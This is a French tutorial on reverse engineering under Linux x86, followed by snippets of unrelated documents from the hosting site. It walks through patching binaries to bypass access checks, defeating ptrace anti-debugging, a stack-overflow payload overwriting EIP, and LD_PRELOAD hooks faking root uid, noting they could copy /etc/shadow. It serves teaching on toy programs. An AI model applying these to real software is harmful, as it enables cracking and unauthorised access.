LARDOUX Guillaume Contact. Auteur. Année Original. guillaume Année de Refonte. REVERSE ENGINEERING SOUS LINUX x86

Dimension: px
Commencer à balayer dès la page:

Download "LARDOUX Guillaume Contact. Auteur. guillaume.lardoux@epitech.eu Année Original. guillaume. 2009 Année de Refonte. REVERSE ENGINEERING SOUS LINUX x86"

Transcription

1 Auteur LARDOUX Guillaume Contact guillaume Année Original 2009 Année de Refonte 2014 REVERSE ENGINEERING SOUS LINUX x86

2 Sommaire 1. Introduction 2. Format ELF & PE 3. Les outils Linux 4. Patcher un Binaire 5. Contourner une Structure Conditionnelle 6. Contourner ptrace() 7. Exploiter un Stack Overflow 8. Hooking avec LD_PRELOAD 9. Contourner le Stripping 10. Obfuscation de Code en C 2

3 1. Introduction Depuis que les ordinateurs existent, il y a toujours eu des bugs dans les machines, des erreurs de programmation ou des défauts dans la conception, conduisant un programme à un endroit d un système qu'il n'était pas censé visiter. Mais dès lors, plusieurs techniques on vu le jour afin d'analyser ces défauts de fonctionnement, dans le but de les corriger ou de les exploiter. Ces techniques reposent en réalité sur un seul grand principe d'analyse de binaire : le «Reverse Engineering». Dans ce document, je vais me consacrer à l'analyse de programme sous Linux 32bits, et non sous Windows, bien plus connu et documenté. L'unique raison à cela est que le système et la structure des fichiers exécutable sous Linux est grandement différente et beaucoup plus attrayante. Sous Windows il porte le nom de PE Portable Executable, tandis que sous Linux il est nommé ELF Extended & Linking Format ; ce dernier sera introduit au prochain chapitre. Il est bon de savoir que la majorité des techniques de Hacking moderne sont basées sur le Reverse Engineering, car cette méthode d'analyse permet de comprendre le fonctionnement sous-jacent et parfois «mystique» d'un programme, et par conséquent de découvrir des failles qu'il aurait été impossible de découvrir autrement, si ce n est par hasard. C'est donc un atout du point de vue de la «sécurité», comme du point de vue du développement, car il est souvent nécessaire de comprendre le cœur du flux d exécution d'un programme qui ne fonctionne pas comme on le souhaiterait pour pouvoir le corriger, ou même l optimiser en fonction de ses besoins! 3

4 2. Format ELF & PE Chaque fichier exécutable sous Linux repose sur une structure nommée ELF. Cette structure, détaillée dans /usr/include/elf.h, permet au système d'exécuter un programme en chargeant ses informations en mémoire de manière structurée. Un programme est découpé en section, et chaque section possède un nom et une fonction propre. De fait.text contient le code exécutable à proprement parler,.rodata contient les SDR String Data Reference etc. Ainsi, lorsqu'on exécute un programme sous Linux, le «loader» va commencer par lire l'ensemble du fichier suivant la structure ELF afin de charger en mémoire chaque information à la bonne place chaînes de caractères, appels système, environnement, etc. pour que ce programme puisse interagir correctement avec le système. 4

5 3. Les outils Linux Afin d'avoir la possibilité d'analyser un programme sous une forme humainement compréhensible, il est nécessaire de posséder quelques outils. Sous Windows ils sont très connu Ollydbg, PEiD, IDA, Win32Dasm etc., mais peut-être peu moins sous Linux. Voici une liste détaillant quelques outils utiles au Reverse Engineering sous Linux. - gcc GNU C Compiler - gdb GNU Debugger - objdump Désassembleur de fichier ELF - strace Trace les appels système d un programme - ltrace Trace les appels aux fonctions des librairies d un programme - string Affiche les SDR d un programme - hexedit Editeur Hexadécimal en mode «Console» Ce sont là des outils de bases indispensables, mais d'autres outils comme «elfsh» ou «DDD» peuvent s'avérer tout aussi intéressant. Pour ce tutoriel, cela sera suffisant. 5

6 4. Patcher un Binaire Pour cette première mise en pratique, je vais m'attarder sur la modification manuelle d'un programme. Pour cela, il va nous falloir analyser l'exécution du programme pour comprendre son fonctionnement et éditer son code machine directement avec «hexedit». Code Source C #include <stdio.h> int main() { int i = 0; } if (i > 15) printf("\n\naccess GRANTED!!\n\n"); else printf("\n\naccess DENIED!!\n\n"); return (0); Comme on peut le constater, obtenir un «accès» sur ce type de programme est un jeu d'enfant, il nous suffit simplement de modifier la valeur de «i» ou encore la condition «if else». Commençons par exécuter le programme et observons sa réaction. root~#./a.out ACCESS DENIED!! root~# Intéressant, nous avons eu un «ACCESS DENIED!!» parce que la valeur de «i» est inférieure à 15. Modifions donc la comparaison et essayons d obtenir un accès. On va commencer de manière simple en désassemblant le code machine du programme avec l utilitaire «objdump». 6

7 root~# objdump -d./a.out a.out: file format elf32-i386 Disassembly of section.init: <_init>: : 55 [...] <main>: : : 8d 4c e4 f0 lea and 0x4(%esp),%ecx $0xfffffff0,%esp b: ff 71 fc pushl -0x4(%ecx) e: 55 push %ebp f: : 89 e5 51 mov push %esp,%ebp %ecx : 83 ec 14 sub $0x14,%esp : c7 45 f movl $0x0,-0x8(%ebp) c: : 83 7d f8 0f 7e 12 cmpl jle $0xf,-0x8(%ebp) <main+0x30> : 83 ec 0c sub $0xc,%esp : push $0x a: e8 1d ff ff ff call c f: 83 c4 10 add $0x10,%esp : eb 10 jmp <main+0x40> : 83 ec 0c sub $0xc,%esp : 68 9d push $0x804849d c: e8 0b ff ff ff call c : 83 c4 10 add $0x10,%esp : b mov $0x0,%eax : 8b 4d fc mov -0x4(%ebp),%ecx c: c9 leave d: 8d 61 fc lea -0x4(%ecx),%esp 80483a0: c3 ret 80483a1: 90 nop 80483a2: 90 nop 80483a3: 90 nop [...] J'ai volontairement supprimé une partie du code ASM afin de gagner de la place, mais cela n'empêche pas de comprendre simplement en lisant ce tutoriel étant donné que le code de la fonction «main» est présent. On observe un JLE Saut Conditionnel en 0x et juste au dessus un CMPL qui compare «i» avec 15. Logiquement, si on modifie la valeur 0xF 15 en décimal du CMPL ou si on supprime le saut conditionnel, on devrait obtenir un accès. On ouvre donc le programme avec «hexedit» et on recherche la chaine hexadécimale «837DF80F», qui correspond au code machine «if (i > 15)» en langage C. 7

8 Une fois trouvé, on vérifie si «7E12» JLE suit ce bout de code pour être sûr d écrire au bon endroit, et on change ce code «7E12» par des «NOP» No Operation, soit «9090» en hexadécimal, on sauvegarde avec le raccourci [CTRL + X] et on relance le programme. root~#./a.out ACCESS GRANTED!! root~# Et voila comment il est possible de modifier un programme sans posséder aucun code source. C est exactement le principe des «cracks» sous Windows, ou encore de certains patchs de sécurité. 8

9 5. Contourner une Structure Conditionnelle A présent que nous savons comment fonctionne un désassembleur et un éditeur hexadécimal, et la façon de modifier un binaire, il va nous falloir apprendre à contourner une structure conditionnelle un peu plus complexe, et cette fois sans toucher au code machine du programme! Code Source C #include <stdio.h> #include <string.h> int main() { char password[] = "Root"; char buffer[500+1]; } printf("password : "); fgets(buffer, sizeof(buffer), stdin); if (strncmp(buffer, password, strlen(password)) == 0) printf("\naccess GRANTED!!\n"); else printf("\naccess DENIED!!\n"); return (0); Comme vous pouvez le constater, j'ai implémenté un système d'authentification très simple, et le but du jeu étant d'obtenir un accès valide. Exécutons le programme afin d'observer son fonctionnement. root~#./a.out Password : root ACCESS DENIED!! root~# Nous allons à présent utiliser «gdb» pour tenter de contourner cette authentification. On charge le programme dans le debugger et on désassemble la fonction «main» afin d'analyser son comportement. 9

10 root~# gdb (gdb) file a.out Reading symbols from /root/a.out...done. Using host libthread_db library "/lib/libthread_db.so.1". (gdb) disass main Dump of assembler code for function main: 0x <main+0>: 0x <main+4>: lea and 0x4(%esp),%ecx $0xfffffff0,%esp 0x b <main+7>: pushl 0xfffffffc(%ecx) 0x e <main+10>: push %ebp 0x f <main+11>: 0x <main+13>: mov push %esp,%ebp %edi 0x <main+14>: push %esi 0x <main+15>: push %ecx 0x <main+16>: 0x a <main+22>: sub lea $0x20c,%esp 0xffffffeb(%ebp),%edi 0x d <main+25>: mov $0x80485e9,%esi 0x <main+30>: cld 0x <main+31>: 0x <main+36>: mov $0x9,%ecx rep movsb %ds:(%esi),%es:(%edi) 0x a <main+38>: sub $0xc,%esp 0x d <main+41>: push $0x80485b8 0x <main+46>: call 0x x <main+51>: add $0x10,%esp 0x a <main+54>: mov 0x ,%eax 0x f <main+59>: sub $0x4,%esp 0x <main+62>: push %eax 0x <main+63>: push $0x1f5 0x <main+68>: lea 0xfffffdf6(%ebp),%eax 0x e <main+74>: push %eax 0x f <main+75>: call 0x x <main+80>: add $0x10,%esp 0x <main+83>: lea 0xffffffeb(%ebp),%eax 0x a <main+86>: mov $0xffffffff,%ecx 0x f <main+91>: mov %eax,0xfffffdf0(%ebp) 0x <main+97>: mov $0x0,%al 0x <main+99>: cld 0x <main+100>: mov 0xfffffdf0(%ebp),%edi 0x e <main+106>: repnz scas %es:(%edi),%al 0x <main+108>: mov %ecx,%eax 0x <main+110>: not %eax 0x <main+112>: dec %eax 0x <main+113>: sub $0x4,%esp 0x <main+116>: push %eax 0x <main+117>: lea 0xffffffeb(%ebp),%eax 0x c <main+120>: push %eax 0x d <main+121>: lea 0xfffffdf6(%ebp),%eax 0x <main+127>: push %eax 0x <main+128>: call 0x x <main+133>: add $0x10,%esp 0x c <main+136>: test %eax,%eax 0x e <main+138>: jne 0x80484b2 <main+158> 0x080484a0 <main+140>: sub $0xc,%esp 10

11 0x080484a3 <main+143>: push 0x080484a8 <main+148>: call 0x080484ad <main+153>: add 0x080484b0 <main+156>: jmp 0x080484b2 <main+158>: sub 0x080484b5 <main+161>: push 0x080484ba <main+166>: call 0x080484bf <main+171>: add 0x080484c2 <main+174>: mov 0x080484c7 <main+179>: lea 0x080484ca <main+182>: pop 0x080484cb <main+183>: pop 0x080484cc <main+184>: pop 0x080484cd <main+185>: pop 0x080484ce <main+186>: lea 0x080484d1 <main+189>: ret End of assembler dump. (gdb) $0x80485c4 0x $0x10,%esp 0x80484c2 <main+174> $0xc,%esp $0x80485d7 0x $0x10,%esp $0x0,%eax 0xfffffff4(%ebp),%esp %ecx %esi %edi %ebp 0xfffffffc(%ecx),%esp Au vu de l exécution du programme, on peut déduire qu'il effectue une vérification du mot de passe saisi pour attribuer un accès ou non. On observe la fonction «strncmp» à l'adresse 0x suivie un peu plus loin d'une comparaison JNE en 0x0x804849e. On va commencer par poser un «breakpoint» juste au dessus de ce JNE, juste après la comparaison du mot de passe saisi, et on relance le programme. (gdb) break *0x c Breakpoint 1 at 0x804849c (gdb) run Starting program: /root/a.out Password : Magicien Breakpoint 1, 0x c in main () (gdb) 11

12 Ayant saisi «Magicien» comme mot de passe, le programme devra normalement nous afficher «ACCESS DENIED!!» si on continue son exécution. Il va donc falloir modifier le déroulement du programme afin de le faire passer sur le bout de code qui nous intéresse, c est-à-dire celui qui affiche «ACCES GRANTED!!». On va donc pointer sur la ligne juste après JNE Jump if Not Equal et on observe. (gdb) jump *main+140 Continuing at 0x80484a0. ACCESS GRANTED!! Program exited normally. (gdb) 12

13 6. Contourner ptrace() Avant de commencer : Qu'est-ce que «ptrace()»? ptrace(), diminutif de «Process Trace», est un appel système sous Linux qui permet de débugger un processus modification de sa mémoire, modification de ses registres etc. Vous pourrez obtenir d avantages d informations avec un simple «man ptrace» ou en lisant le manuel sur Cet appel système peu aussi agir en tant que système de détection d'analyse, et peut donc permettre à des programmes de se protéger contre toute attaque ou analyse dynamique. Code Source C #include <stdio.h> #include <sys/ptrace.h> int main() { if (ptrace(ptrace_traceme, 0, 1, 0) < 0) printf("\ndebuging Detected...\n"); else printf("\naccess GRANTED!!\n"); return (0); } Comme on peut le voir, le programme quittera sans aucune explication seulement si on tente de le débugger, mais s exécutera normalement sinon. root~#./a.out ACCESS GRANTED!! root~# gdb./a.out (gdb) run Starting program: /root/a.out Debuging Detected... Program exited normally. (gdb) 13

14 Aucune surprise jusqu ici. Il va donc falloir trouver un moyen de contourner cette restriction en lançant une analyse. root~# objdump -d./a.out a.out: file format elf32-i386 Disassembly of section.init: c <_init>: c: 55 push %ebp d: f: 89 e5 83 ec 08 mov sub %esp,%ebp $0x8,%esp : e8 8d call <call_gmon_start> [...] <main>: : 8d 4c lea 0x4(%esp),%ecx : 83 e4 f0 and $0xfffffff0,%esp b: ff 71 fc pushl -0x4(%ecx) e: 55 push %ebp f: 89 e5 mov %esp,%ebp 80483a1: 51 push %ecx 80483a2: 83 ec 04 sub $0x4,%esp 80483a5: 6a 00 push $0x a7: 6a 01 push $0x a9: 6a 00 push $0x ab: 6a 00 push $0x ad: e8 02 ff ff ff call 80482b b2: 83 c4 10 add $0x10,%esp 80483b5: 85 c0 test %eax,%eax 80483b7: jns 80483cb <main+0x37> 80483b9: 83 ec 0c sub $0xc,%esp 80483bc: 68 c push $0x80484c c1: e8 0e ff ff ff call 80482d c6: 83 c4 10 add $0x10,%esp 80483c9: eb 10 jmp 80483db <main+0x47> 80483cb: 83 ec 0c sub $0xc,%esp 80483ce: 68 de push $0x80484de 80483d3: e8 fc fe ff ff call 80482d d8: 83 c4 10 add $0x10,%esp 80483db: b mov $0x0,%eax 80483e0: 8b 4d fc mov -0x4(%ebp),%ecx 80483e3: c9 leave 80483e4: 8d 61 fc lea -0x4(%ecx),%esp 80483e7: c3 ret 80483e8: 90 nop [...] 14

15 Comme on peut le remarquer à l'adresse 0x080483ad, il y a un appel à la fonction «ptrace», il va donc nous falloir supprimer ou contourner cet appel système afin de pouvoir lancer le programme normalement dans un debugger. Ouvrons-le avec «hexedit» et modifions le JNS en JMP pour le forcer à sauter. Pour ce faire, il suffit de modifier la valeur «7912» de ce JNS, en «EB12». On referme, et on exécute avec GDB pour vérifier. root~# hexedit./a.out root~#./a.out ACCESS GRANTED!! root~# gdb./a.out Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run Starting program: /root/a.out ACCESS GRANTED!! Program exited normally. (gdb)quit Tout fonctionne à merveille, le programme s'exécute normalement même lorsque nous le lançons avec un debugger, on peut donc considérer «ptrace» comme ayant été contourné. 15

16 7. Exploiter un Stack Overflow À présent, nous allons utiliser nos compétences afin de trouver et exploiter une faille de type «Stack Overflow». Il s'agit d'un débordement de mémoire se produisant dans la pile du programme cible. Voici un code vulnérable pour notre étude. Code Source C #include <stdio.h> #include <string.h> void Fonction() { printf("\nstack Overflow exploited!!\n"); } void Auth(char *argv) { char buffer[10]; strcpy(buffer, argv); } int main(int argc, char **argv) { if (argc > 1) { printf("cherche la Faille!!\n"); Auth(argv[1]); } else printf("usage : auth <password>\n"); return (0); } Dans ce programme très simple, un mot de passe saisi est placé dans un tampon de 10 octets (un caractère = 1 octet sur x86). Le problème ici est simple : que se passera t-il si je saisi un mot de passe de plus de 10 caractères? root~#./a.out Usage : auth <password> root~#./a.out Root Cherche la Faille!! root~#./a.out Cherche la Faille!! Segmentation fault 16

17 Comme nous pouvons le constater, il s est produit un dépassement de mémoire au bout de 10 caractères saisi. En langage C, le caractère de fin de chaine est toujours «\0», c'est pour cette raison que dans cet exemple la longueur maximum accordée à l'utilisateur est de 9 et non de 10! Cherchons maintenant un moyen d'exploiter ce problème. On va ouvrir «gdb» et lancer une analyse. On va saisir un mot de passe de 25 caractères et observer sa réaction. root~# gdb./a.out Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run aaaaaaaaaaaaaaaaaaaaaaaaa Starting program: /root/a.out aaaaaaaaaaaaaaaaaaaaaaaaa Cherche la Faille!! Program received signal SIGSEGV, Segmentation fault. 0x in?? () Très intéressant, nous avons complètement réécrit EIP Extended Instruction Pointer! EIP est un registre des processeurs INTEL x86 qui permet d'enregistrer l'adresse de la prochaine instruction à exécuter, on a ici complètement écraser cette adresse avec des «0x61» ; sachant que «0x61» est la valeur hexadécimale du caractère «a» dans la table ASCII, on peut en déduire qu'il est possible d'exploiter cette vulnérabilité pour rediriger totalement le flux d exécution du programme. Pour cette expérience, nous allons tenter d'exécuter la fonction «Fonction()». Mais nous avons un problème : Combien de caractères faut-il pour écraser complètement EIP? Il va falloir faire des essais successifs. (gdb) run aaaaaaaaaaaaaaa The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/a.out aaaaaaaaaaaaaaa Cherche la Faille!! Program received signal SIGSEGV, Segmentation fault. 0x in?? () (gdb) 17

18 Après quelques recherches, on comprend que 15 caractères permettent d'écrire sur le dernier octet du registre EIP, donc 18 caractères permettront de l écraser complètement, étant donné qu un registre de processeur x86 est codé sur 4 octet. Maintenant on recherche l'adresse de la fonction «Fonction()» avec gdb. (gdb) disass Fonction Dump of assembler code for function Fonction: 0x <Fonction+0>: push %ebp 0x <Fonction+1>: mov %esp,%ebp 0x <Fonction+3>: 0x a <Fonction+6>: sub sub $0x8,%esp $0xc,%esp 0x d <Fonction+9>: push $0x x080483a2 <Fonction+14>: call 0x80482d4 <puts@plt> 0x080483a7 <Fonction+19>: 0x080483aa <Fonction+22>: add leave $0x10,%esp 0x080483ab <Fonction+23>: ret End of assembler dump. On voit que l'adresse de début de la fonction est 0x , par conséquent il suffit d'écrire 14 fois «a» suivie de cette adresse. Il faudra aussi penser au fait que nous sommes en «Little Indian». Voyons cela plus concrètement en testant notre théorie. (gdb) run `python -c 'print "aaaaaaaaaaaaaa\x94\x83\x04\x08"'` Starting program: /root/a.out `python -c 'print "aaaaaaaaaaaaaa\x94\x83\x04\x08"'` Cherche la Faille!! Stack Overflow exploited!! Program received signal SIGSEGV, Segmentation fault. 0xbfc9a500 in?? () (gdb) Et voila un beau «Stack Overflow» mis à mal. Pour cet exemple, nous avons exécuté une fonction interne au programme qui n'était pas censée s'exécuter en situation normal car elle n est jamais appelée, mais il est tout aussi possible d'injecter du code permettant l'exécution d'un shell avec les droits du programme. 18

19 8. Hooking avec LD_PRELOAD Encore une fois : Qu est-ce que LD_PRELOAD? C est une variable d'environnement sous Linux, tout comme %SYSTEMROOT% ou %PROGRAMFILES% sous Windows. Elle permet de spécifier au système quelle bibliothèque partagée sera chargée avec un programme lors de son exécution. Si cette variable est définie, l'éditeur de liens s occupera de charger notre bibliothèque avant toutes les autres. L'utilité de tout ça? Si on charge une bibliothèque de fonction supplémentaire dans la mémoire d'un programme, contenant des fonctions portant exactement le même nom que les fonctions ayant été appelées par ce même programme, ce sont alors nos fonctions qui vont être exécutées à la place des fonctions d origines. Ce genre de pratique porte un nom, c est le «hooking». Autrement dit, créer une fonction portant le nom d'une fonction du système, et ordinairement appelée par un programme ; si nous pré-chargeons nos fonctions avant toutes les autres lors d'une exécution, ce sont nos fonctions qui auront la «priorité» pour s'exécuter. Voici un programme de démonstration qui va simplement afficher un UID lors de son exécution. Code Source C #include <stdio.h> #include <unistd.h> int main() { int i = getuid(); printf("(uid)=%i\n", i); return (0); } Vérifions à présent afin de mieux comprendre comment cela réagit. root~# gcc getuid.c root~#./a.out (uid)=0 root~# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk) 19

20 Le programme «id» inclut dans le système nous permet de vérifier que notre programme fonctionne correctement, étant donné que je suis bien «root» au moment ou j'exécute le programme. Je vais maintenant créer un nouvel utilisateur sur le système, me loguer sous cet utilisateur, et regarder l'uid qui m'a été attribué par le système. Nous allons ensuite commencer notre travail de contournement de fonction système. root~# adduser magicien User ID ('UID') [ defaults to next available ]: 951 Initial group [ users ]: Additional groups (comma separated) []: Home directory [ /home/magicien ] Shell [ /bin/bash ] Expiry date (YYYY-MM-DD) []: New account will be created as follows: Login name...: magicien UID...: 951 Initial group...: users Additional groups: [ None ] Home directory...: /home/magicien Shell...: /bin/bash Expiry date...: [ Never ] This is it... if you want to bail out, hit Control-C. Otherwise, press ENTER to go ahead and make the account. Creating new account... Changing the user information for magicien Enter the new value, or press ENTER for the default Full Name []: Magicien Room Number []: Work Phone []: Home Phone []: Other []: Changing password for magicien Enter the new password (minimum of 5, maximum of 127 characters) Please use a combination of upper and lower case letters and numbers. New password: Bad password: too short. Warning: weak password (enter it again to use it anyway). New password: Re-enter new password: Password changed. Account setup complete. root~# su magicien magicien~$ id uid=951(magicien) gid=100(users) groups=100(users) 20

21 Nous allons maintenant écrire une librairie et définir LD_PRELOAD avec le chemin de cette nouvelle librairie. Le but sera de faire afficher au programme «id» du système, ainsi qu'à notre programme écrit plus haut, la valeur «0» ; qui je le rappel est l UID du compte «root» sur Linux. Code Source C #include <stdio.h> int getuid() { return (0); } int geteuid() { return (0); } int getgid() { return (0); } Une fois compilé avec la commande «gcc -shared lib.c -o falseid.so», il ne nous reste plus qu'à charger notre nouvelle bibliothèque dans LD_PRELOAD, et vérifier si tout fonctionne comme nous le voulons. root~# su magicien magicien~$ pwd /root magicien~$ id uid=951(magicien) gid=100(users) groups=100(users) magicien~$ export LD_PRELOAD=/root/falseid.so magicien~$ id uid=0(root) gid=0(root) egid=100(users) groups=100(users) magicien~$ /root/a.out (id)=0 magicien~$ exit 21

22 Comme on peut l observer, notre détournement de fonction «getuid» fonctionne à merveille. Pour cette exemple, je n'ai fait que mettre en avant le principe final, mais sachez que nous pouvons faire bien plus que déconcerter des fonctions d'affichage d'uid ou de GID. Nous pouvons par exemple reprogrammer une fonction pour lui faire afficher un shell, copier le fichier /etc/shadow, et bien plus encore. En y repensant, on aurait même pu reprogrammer ptrace() afin qu'il retourne toujours «0», ce qui aurait eu pour effet d'annuler l'action réel de la fonction dans l'explication détaillé plus haut. Cela pourrait aussi servir à valider un logiciel en recodant certaines fonctions critique comme malloc(), en lui faisant retourner «NULL» dans tout les cas! Pour finir, il est bon de savoir que pour vider le contenu de LD_PRELOAD afin de rendre aux programmes leurs fonctionnement normal, il suffit simplement de taper «LD_PRELOAD=""» après avoir effectué les actions souhaitées. root~# LD_PRELOAD="" root~# id uid=951(magicien) gid=100(users) groups=100(users) 22

23 9. Contourner le Stripping Le stripping est une technique qui permet de détruire la «Table des Symboles» sous Linux. Une table de symboles contient entre autre les adresses des variables, les noms des fonctions et les labels. L'outil permettant d'effectuer cette action est «strip». La démonstration ci-dessous utilise un programme au hasard, il n y a pas de code à montrer parce que nous en avons pas besoin ici. Prenez n importe quelle bout de code ou programme et essayez, vous constaterez le même résultat. root~# gcc prog.c root~# objdump -d./a.out a.out: file format elf32-i386 Disassembly of section.init: <_init>: : 55 push %ebp : 89 e5 mov %esp,%ebp : 83 ec 08 sub $0x8,%esp a: e call 80482d4 <call_gmon_start> f: e8 cc call <frame_dummy> : e8 c call < do_global_ctors_aux> : c9 leave a: c3 ret Disassembly of section.plt: [...] <main>: : 8d 4c lea 0x4(%esp),%ecx : 83 e4 f0 and $0xfffffff0,%esp b: ff 71 fc pushl -0x4(%ecx) e: 55 push %ebp f: 89 e5 mov %esp,%ebp : 51 push %ecx : 83 ec 04 sub $0x4,%esp : 89 4d f8 mov %ecx,-0x8(%ebp) : 8b 45 f8 mov -0x8(%ebp),%eax b: cmpl $0x1,(%eax) [...] Comme nous pouvons le constater, tout semble normal. Nous allons à présent stripper ce programme et observer ce que cela produit. 23

24 root~# strip./a.out root~# objdump -d./a.out a.out: file format elf32-i386 Disassembly of section.init: <.init>: : 55 push %ebp : : 89 e5 83 ec 08 mov sub %esp,%ebp $0x8,%esp a: e [...] b0 <.text>: 80482b0: 31 ed xor %ebp,%ebp 80482b2: 5e pop %esi 80482b3: 89 e1 mov %esp,%ecx 80482b5: 80482b8: 83 e4 f0 50 and push $0xfffffff0,%esp %eax 80482b9: 54 push %esp 80482ba: 52 push %edx 80482bb: 68 b push $0x80483b c0: 68 c push $0x80483c c5: 51 push %ecx 80482c6: 56 push %esi 80482c7: push $0x cc: e8 bb ff ff ff call c < libc_start_main@plt> 80482d1: f4 hlt 80482d2: 90 nop [...] Dans ce test, aucun symbole n'est présent. Vous pourriez vous dire : Mais en quoi cela est-il gênant? On va donc essayer d analyser ce programme avec «gdb». root~# gdb a.out (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". (gdb) disass main No symbol table is loaded. Use the "file" command. (gdb) Et oui, il n y plus de symboles et donc plus aucune références! Plutôt ennuyeux lorsqu'on a un programme de plusieurs centaines de kilo octet à analyser. Il existe tout de même un outil capable de remettre en place la table des symboles, il se nomme «fenris». Mais voyons comment il est possible de se débrouiller sans table des symboles. 24

25 Voici un dump du code ASM de la section.text Code du Programme. Disassembly of section.text: b0 <.text>: 80482b0: 31 ed xor %ebp,%ebp 80482b2: 5e pop %esi 80482b3: 89 e1 mov %esp,%ecx 80482b5: 83 e4 f0 and $0xfffffff0,%esp 80482b8: 50 push %eax 80482b9: 54 push %esp 80482ba: 52 push %edx 80482bb: 68 b push $0x80483b c0: 68 c push $0x80483c c5: 51 push %ecx 80482c6: 56 push %esi 80482c7: push $0x cc: e8 bb ff ff ff call c < 80482d1: f4 hlt 80482d2: 90 nop 80482d3: 90 nop 80482d4: 55 push %ebp 80482d5: 89 e5 mov %esp,%ebp 80482d7: 53 push %ebx 80482d8: 83 ec 04 sub $0x4,%esp 80482db: e call 80482e e0: 5b pop %ebx 80482e1: 81 c3 a add $0x12a4,%ebx 80482e7: 8b 93 fc ff ff ff mov -0x4(%ebx),%edx 80482ed: 85 d2 test %edx,%edx 80482ef: je 80482f f1: e8 86 ff ff ff call c < 80482f6: 58 pop %eax 80482f7: 5b pop %ebx 80482f8: c9 leave 80482f9: c3 ret 80482fa: 90 nop 80482fb: 90 nop 80482fc: 90 nop 80482fd: 90 nop 80482fe: 90 nop 80482ff: 90 nop 25

26 : 55 push %ebp : 89 e5 mov %esp,%ebp : 83 ec 08 sub $0x8,%esp : 80 3d a cmpb $0x0,0x80495a d: 74 0c je b f: eb 1c jmp d : 83 c0 04 add $0x4,%eax : a3 a mov %eax,0x80495a : ff d2 call *%edx b: a1 a mov 0x80495a4,%eax : 8b 10 mov (%eax),%edx : 85 d2 test %edx,%edx : 75 eb jne : c6 05 a movb $0x1,0x80495a d: c9 leave e: c3 ret f: 90 nop : 55 push %ebp : 89 e5 mov %esp,%ebp : 83 ec 08 sub $0x8,%esp : a1 b mov 0x804 [...] On observe très facilement qu'à chaque fois des NOP apparaissent, c est en réalité la coupure entre chaque section. Cela nous permet déjà de connaitre le nombre de section, et donc de savoir combien de lignes il faudra analyser lorsque nous aurons trouvé le «main». Une autre chose à savoir est qu'il est vraiment très rare que nous puissions trouver des références de fonctions de type < ou encore < libc_start_main@plt>. Dans une fonction aucune indication n'apparait, si un appel de fonction est présent il se fera comme d'habitude, à savoir quelque chose du type <puts@plt>, autrement dit directement par le nom de la fonction. 26

27 10. Obfuscation de Code en C L'obfuscation de code est une technique dont l objectif est de rendre aussi difficile que possible la compréhension d un code source. Il existe même des concours, comme le «International Obfuscated C Code Contest» qui possède son propre site internet : Dans un but didactique, je vais jouer avec la directive «#define» du préprocesseur C afin d alourdir légèrement la syntaxe du code généré. Code Source C #include <stdio.h> #define A int #define B main #define C printf #define D return #define Z "Bonjour Root...\n" A B(){C(Z);D (1337);} root~# gcc obfusc.c root~#./a.out Bonjour Root... root~# Comme on peut l'observer, c est vraiment un jeu d'enfant à mettre en œuvre. Il faut tout de même faire attention à bien comprendre que l objectif n est pas de protéger le code machine du programme, mais bien le code source. Le programme compilé sera structuré et exécuté de la même façon. 27

Les failles Format String

Les failles Format String Les failles Format String Concept et exploitation Warr 01/10/2010 Introduction Je rédige ce papier afin de combler un manque cruel (à mon sens) de documentation à propos de ces failles. L essentiel des

Plus en détail

Les techniques de protection du logiciel

Les techniques de protection du logiciel Travail d'études Licence Informatique 2003-2004 Les techniques de protection du logiciel Julien BURLE Térence SCALABRE Encadré par Mr Pierre CRESCENZO Travail d'étude: Les techniques de protection du logiciel

Plus en détail

Programmation assembleur : aperçu

Programmation assembleur : aperçu Assembleur : Younès EL AMRANI. 1 Programmation assembleur : aperçu Programmation en assembleur : NASM Module M14 Semestre 4 Printemps 2010 Equipe pédagogique : Younès El Amrani, Abdelhakim El Imrani, Faissal

Plus en détail

GlobalScape Secure FTP Server 3.0.2 Buffer Overflow

GlobalScape Secure FTP Server 3.0.2 Buffer Overflow GlobalScape Secure FTP Server 3.0.2 Buffer Overflow muts@whitehat.co.il Traduction française: jerome[at]athias.fr http://www.athias.fr/jerome/doc/ Qu est-ce que le Serveur FTP Sécurisé GlobalScape?...

Plus en détail

Résumé Génération de code Le code intermédiaire

Résumé Génération de code Le code intermédiaire Résumé Analyse INFO0004 Structure des langages de programmation Génération de code ; liaison et exécution Justus H. Piater Programmation Analyse Compilation Liaison fichier texte Analyse lexicale flux

Plus en détail

Logiciel de base. Première année ENSIMAG

Logiciel de base. Première année ENSIMAG Logiciel de base Première année ENSIMAG 1 Procédures, paramètres, pile En assembleur une fonction est une étiquette, c'est l'adresse de sa première instruction Lors de l'appel d'une fonction, la pile sert

Plus en détail

Structure d un programme

Structure d un programme Architecture des ordinateurs Cours 6 Structure d un programme 3 décembre 2012 Archi 1/30 Programme en Assembleur Archi 2/30 Sections de données programme en assembleur = fichier texte (extension.asm) organisé

Plus en détail

Architecture des ordinateurs

Architecture des ordinateurs Architecture des ordinateurs Cours 7 17 décembre 2012 Archi 1/1 Fonctions, suite et fin Archi 2/1 Rappel Forme générale d un sous-programme (fonction) : etiquette sousprogramme: push ebp ; empile la valeur

Plus en détail

Cours Programmation Système

Cours Programmation Système Cours Programmation Système Filière SMI Semestre S6 El Mostafa DAOUDI Département de Mathématiques et d Informatique, Faculté des Sciences Université Mohammed Premier Oujda m.daoudi@fso.ump.ma Février

Plus en détail

1/24. I passer d un problème exprimé en français à la réalisation d un. I expressions arithmétiques. I structures de contrôle (tests, boucles)

1/24. I passer d un problème exprimé en français à la réalisation d un. I expressions arithmétiques. I structures de contrôle (tests, boucles) 1/4 Objectif de ce cours /4 Objectifs de ce cours Introduction au langage C - Cours Girardot/Roelens Septembre 013 Du problème au programme I passer d un problème exprimé en français à la réalisation d

Plus en détail

Architecture des ordinateurs : Programmation des processeurs avec l'environnement «y86» (INF155)

Architecture des ordinateurs : Programmation des processeurs avec l'environnement «y86» (INF155) Architecture des ordinateurs : Programmation des processeurs avec l'environnement «y86» (INF155) F. Pellegrini Université Bordeaux 1 Ce document est copiable et distribuable librement et gratuitement à

Plus en détail

Le langage C++ est un langage de programmation puissant, polyvalent, on serait presque tenté de dire universel, massivement utilisé dans l'industrie

